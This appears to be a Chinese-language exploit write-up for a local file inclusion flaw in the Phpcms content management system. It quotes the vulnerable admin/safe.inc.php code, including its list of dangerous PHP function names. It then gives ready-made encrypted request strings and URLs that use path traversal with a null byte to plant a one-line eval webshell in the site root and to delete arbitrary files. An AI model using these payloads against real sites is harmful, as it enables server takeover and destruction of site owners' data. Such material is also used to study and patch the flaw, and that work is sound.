Phpcms 是国内领先的网站内容管理系统,同时也是一个开源的PHP开发框架。Phpcms由内容模型、会员、问吧、专题、财务、订单、广告、邮件订阅、短消息、自定义表单、全站搜索等20多个功能模块组成,内置新闻、图片、下载、信息、产品5大内容模型。Phpcms 采用模块化开发,支持自定义内容模型和会员模型,并且可以自定义字段。 PHPCMS的技术优势主要体现在系统的稳定性、扩展性、安全性、全面性,在负载能力和发布效率上具有突出的优势。
phpcms本地包含类漏洞,如果该文件包含了/include/common.inc.php就可以包含执行很多后台才能执行的文件了。由于phpcms的全局变量机制,导致能拿shell的方法很多,类似的问题不止一个。admin/safe.inc.php文件是后台扫木马的程序,但是很可惜的是虽然文件名叫做safe,但是一点也不safe。
贴上存在漏洞的代码 /admin/safe.inc.php
-----------------------------------------------------
<?php defined(‘IN_PHPCMS’) or exit(‘Access Denied’); // include/common.inc.php 里面声明了常量 // define(‘IN_PHPCMS’, TRUE); if(empty($action)) $action = “start”; $safe = cache_read(‘safe.php’); $filecheck = load(‘filecheck.class.php’); if(empty($safe)) { $safe = array ( ‘file_type’ => ‘php|js’, ‘code’ => ”, ‘func’ => ‘com|system|exec|eval|escapeshell|cmd|passthru|base64_decode|gzuncompress’, ‘dir’ => $filecheck->checked_dirs() ); } switch ($action) { … case ‘edit_code’: if (file_put_contents(PHPCMS_ROOT.$file_path, stripcslashes($code))) { showmessage(‘修改成功!’); } break; case ‘del_file’: $file_path = urldecode($files); if (empty($file_path)) { showmessage(‘请选择文件’); } $file_list = cache_read(‘scan_backdoor.php’); unset($file_list[$file_path]); cache_write(‘scan_backdoor.php’,$file_list); @unlink(PHPCMS_ROOT.$file_path); showmessage(‘文件删除成功!’, ‘?mod=phpcms&file=safe&action=scan_table’); break; …
---------------------------------------------------
拿shell的方法:
包含:admin/safe.inc.php文件GET提交一下数据
将在根目录下生成一句话 用上一篇得到的密钥$key=’sIpeofogblFVCildZEwe’; 加密如下字符串 $evil=’i=1&m=1&f=fuck&action=edit_code&file_path=evil.php&code=<?eval($_POST[a])?>&mod=../../admin/safe.inc.php%00′;
http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBUBBhIwBA0II3AlAAABBTUWERt0FRMGCkEXChx
gNSwNCVlmehITEiVYQTA2IDQ2NycLalZSQjcqE1hdZ19LQUkOAw8FKHkwCAoBdCwZBl05GBVKVl8=
将在根目录下生成一句话木马
同理任意文件删除漏洞: $evil=’i=1&m=1&f=fuck&action=del_file&files=robots.txt&mod=../../admin/safe.inc.php%00′;
http://127.0.0.1/n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKBTkxHgoddBQAAzkJDg4JYDAqBQkXZzcYBxw9A0sbHhtB
DwMia21HQ0p0ahYBHiAeShwHCQJMBSg1bRkEFH91Rw==
|